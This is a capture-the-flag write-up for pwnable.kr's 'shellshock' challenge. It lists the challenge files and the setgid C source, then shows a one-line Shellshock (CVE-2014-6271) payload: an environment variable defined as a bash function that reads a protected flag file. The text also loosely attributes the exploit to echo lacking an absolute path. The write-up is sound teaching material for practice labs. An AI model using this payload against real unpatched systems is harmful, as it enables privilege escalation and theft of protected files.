shellshock
The tenth challenge from pwnable.kr
Description
Mommy, there was a shocking news about bash. I bet you already know, but lets just make it sure :)
ssh shellshock@pwnable.kr -p2222 (pw:guest)
Solution
shellshock@ubuntu:~$ ls -la
total 980
drwxr-x--- 5 root shellshock 4096 Oct 23 2016 .
drwxr-xr-x 93 root root 4096 Oct 10 22:56 ..
-r-xr-xr-x 1 root shellshock 959120 Oct 12 2014 bash
d--------- 2 root root 4096 Oct 12 2014 .bash_history
-r--r----- 1 root shellshock_pwn 47 Oct 12 2014 flag
dr-xr-xr-x 2 root root 4096 Oct 12 2014 .irssi
drwxr-xr-x 2 root root 4096 Oct 23 2016 .pwntools-cache
-r-xr-sr-x 1 root shellshock_pwn 8547 Oct 12 2014 shellshock
-r--r--r-- 1 root root 188 Oct 12 2014 shellshock.c
We’ll need shellshock to open up flag for us. Seems we have a vulnerable bash program involved as well.
Let’s open up shellshock.c
#include <stdio.h>
int main(){
setresuid(getegid(), getegid(), getegid());
setresgid(getegid(), getegid(), getegid());
system("/home/shellshock/bash -c 'echo shock_me'");
return 0;
}
echo doesn’t have an absolute path, so let’s try modifying ENV variables.
shellshock@ubuntu:~$ export echo="() { cat /home/shellshock/flag; }"
Capturing the Flag
shellshock@ubuntu:~$ ./shellshock
only if I knew CVE-2014-6271 ten years ago..!!